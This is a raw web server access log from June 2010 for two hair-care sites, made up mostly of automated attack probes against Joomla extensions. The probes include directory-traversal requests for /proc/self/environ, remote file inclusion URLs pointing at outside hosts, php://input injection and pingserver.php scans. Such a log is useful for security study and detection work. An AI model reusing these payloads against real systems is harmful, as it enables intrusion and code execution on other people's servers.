216.17.105.143 - - [21/Jun/2010:08:18:52 -0700] "GET /?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.830" "www.freehairsecrets.com"
216.17.105.143 - - [21/Jun/2010:08:18:52 -0700] "GET /logs/?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.830" "www.freehairsecrets.com"
213.251.189.201 - - [21/Jun/2010:08:21:08 -0700] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://templatewinkel.nl/images/test? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.freehairsecrets.com"
213.251.189.201 - - [21/Jun/2010:08:21:08 -0700] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://templatewinkel.nl/images/test? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.freehairsecrets.com"
163.20.26.5 - - [21/Jun/2010:08:21:08 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:08:23:04 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
174.142.68.199 - - [21/Jun/2010:08:24:02 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.142.68.199 - - [21/Jun/2010:08:24:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.142.68.199 - - [21/Jun/2010:08:24:02 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.142.68.199 - - [21/Jun/2010:08:24:06 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.142.68.199 - - [21/Jun/2010:08:24:06 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.142.68.199 - - [21/Jun/2010:08:24:06 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:08:24:38 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:08:24:38 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:08:24:39 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:08:24:45 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:08:24:46 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:08:24:46 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.20.81.163 - - [21/Jun/2010:08:25:38 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.20.81.163 - - [21/Jun/2010:08:25:39 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.20.81.163 - - [21/Jun/2010:08:25:39 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
201.36.173.93 - - [21/Jun/2010:08:26:39 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
89.108.64.232 - - [21/Jun/2010:08:27:57 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:08:27:58 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:08:27:58 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
201.36.173.93 - - [21/Jun/2010:08:28:55 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
99.198.113.90 - - [21/Jun/2010:08:30:22 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
99.198.113.90 - - [21/Jun/2010:08:30:22 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
99.198.113.90 - - [21/Jun/2010:08:30:22 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.129.168.234 - - [21/Jun/2010:08:31:56 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.129.168.234 - - [21/Jun/2010:08:31:56 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.129.168.234 - - [21/Jun/2010:08:31:57 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.210.98.200 - - [21/Jun/2010:08:35:52 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:08:46:32 -0700] "GET /logs/access_090615.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
202.181.97.85 - - [21/Jun/2010:08:57:03 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
202.181.97.85 - - [21/Jun/2010:08:57:04 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
202.181.97.85 - - [21/Jun/2010:08:57:42 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
202.181.97.85 - - [21/Jun/2010:08:57:46 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
163.20.26.5 - - [21/Jun/2010:09:03:55 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
163.20.26.5 - - [21/Jun/2010:09:03:55 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
163.20.26.5 - - [21/Jun/2010:09:03:56 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
87.106.28.150 - - [21/Jun/2010:09:13:05 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.28.150 - - [21/Jun/2010:09:13:05 -0700] "GET /index.php?option=com_fabrik&controller=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.28.150 - - [21/Jun/2010:09:13:06 -0700] "GET /logs//index.php?option=com_fabrik&controller=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.181.97.85 - - [21/Jun/2010:09:13:07 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
202.181.97.85 - - [21/Jun/2010:09:13:07 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
202.181.97.85 - - [21/Jun/2010:09:13:08 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
202.181.97.85 - - [21/Jun/2010:09:13:08 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
202.181.97.85 - - [21/Jun/2010:09:13:09 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
202.181.97.85 - - [21/Jun/2010:09:13:09 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
87.106.28.150 - - [21/Jun/2010:09:13:55 -0700] "GET /logs//index.php?option=com_fabrik&controller=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.28.150 - - [21/Jun/2010:09:13:55 -0700] "GET /index.php?option=com_fabrik&controller=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.28.150 - - [21/Jun/2010:09:13:55 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.28.150 - - [21/Jun/2010:09:14:30 -0700] "GET /index.php?option=com_fabrik&controller=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.28.150 - - [21/Jun/2010:09:14:30 -0700] "GET /logs//index.php?option=com_fabrik&controller=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.28.150 - - [21/Jun/2010:09:14:31 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.228.62.66 - - [21/Jun/2010:09:16:49 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:09:16:49 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:09:16:49 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:09:16:49 -0700] "POST /logs/access.log%20%20/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:09:16:49 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:09:16:49 -0700] "POST /logs/access.log%20%20/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
69.39.232.17 - - [21/Jun/2010:09:21:25 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.39.232.17 - - [21/Jun/2010:09:21:25 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.39.232.17 - - [21/Jun/2010:09:21:25 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.181.97.85 - - [21/Jun/2010:09:21:52 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
202.181.97.85 - - [21/Jun/2010:09:21:53 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
202.181.97.85 - - [21/Jun/2010:09:21:54 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
81.19.215.12 - - [21/Jun/2010:09:21:56 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.19.215.12 - - [21/Jun/2010:09:21:56 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.19.215.12 - - [21/Jun/2010:09:21:57 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:09:21:58 -0700] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:09:21:59 -0700] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
202.181.97.85 - - [21/Jun/2010:09:22:08 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
202.181.97.85 - - [21/Jun/2010:09:22:08 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
202.181.97.85 - - [21/Jun/2010:09:22:09 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
201.36.173.93 - - [21/Jun/2010:09:22:20 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
201.36.173.93 - - [21/Jun/2010:09:22:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
201.36.173.93 - - [21/Jun/2010:09:22:21 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:09:22:52 -0700] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:09:22:52 -0700] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
91.121.207.100 - - [21/Jun/2010:09:23:18 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.207.100 - - [21/Jun/2010:09:23:18 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.207.100 - - [21/Jun/2010:09:23:18 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
99.198.113.90 - - [21/Jun/2010:09:24:16 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
99.198.113.90 - - [21/Jun/2010:09:24:16 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
99.198.113.90 - - [21/Jun/2010:09:24:16 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.109.74 - - [21/Jun/2010:09:24:16 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.109.74 - - [21/Jun/2010:09:24:16 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.109.74 - - [21/Jun/2010:09:24:16 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.170.148 - - [21/Jun/2010:09:24:22 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.170.148 - - [21/Jun/2010:09:24:23 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.170.148 - - [21/Jun/2010:09:24:23 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.240.226 - - [21/Jun/2010:09:24:39 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.240.226 - - [21/Jun/2010:09:24:39 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.232.240.226 - - [21/Jun/2010:09:24:39 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.129.168.234 - - [21/Jun/2010:09:25:17 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.129.168.234 - - [21/Jun/2010:09:25:18 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.129.168.234 - - [21/Jun/2010:09:25:18 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.241.102.51 - - [21/Jun/2010:09:25:33 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.241.102.51 - - [21/Jun/2010:09:25:33 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.241.102.51 - - [21/Jun/2010:09:25:33 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.36 - - [21/Jun/2010:09:28:45 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.36 - - [21/Jun/2010:09:28:45 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.36 - - [21/Jun/2010:09:28:45 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
12.105.198.98 - - [21/Jun/2010:09:31:06 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
12.105.198.98 - - [21/Jun/2010:09:31:06 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
12.105.198.98 - - [21/Jun/2010:09:31:06 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.138.103.13 - - [21/Jun/2010:09:31:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "www.freehairsecrets.com"
89.138.103.13 - - [21/Jun/2010:09:31:26 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "www.freehairsecrets.com"
64.59.71.225 - - [21/Jun/2010:09:33:07 -0700] "POST /index.php?option=com_redtwitter&view=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
64.59.71.225 - - [21/Jun/2010:09:33:07 -0700] "POST /index.php?option=com_redtwitter&view=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
64.59.71.225 - - [21/Jun/2010:09:35:11 -0700] "POST /logs/access.log/index.php?option=com_redtwitter&view=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
64.59.71.225 - - [21/Jun/2010:09:35:11 -0700] "POST /index.php?option=com_redtwitter&view=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
64.59.71.225 - - [21/Jun/2010:09:35:11 -0700] "POST /logs/index.php?option=com_redtwitter&view=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
64.59.71.225 - - [21/Jun/2010:09:35:15 -0700] "POST /logs/access.log/index.php?option=com_redtwitter&view=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
64.59.71.225 - - [21/Jun/2010:09:35:15 -0700] "POST /index.php?option=com_redtwitter&view=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
64.59.71.225 - - [21/Jun/2010:09:35:15 -0700] "POST /logs/index.php?option=com_redtwitter&view=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:09:37:34 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
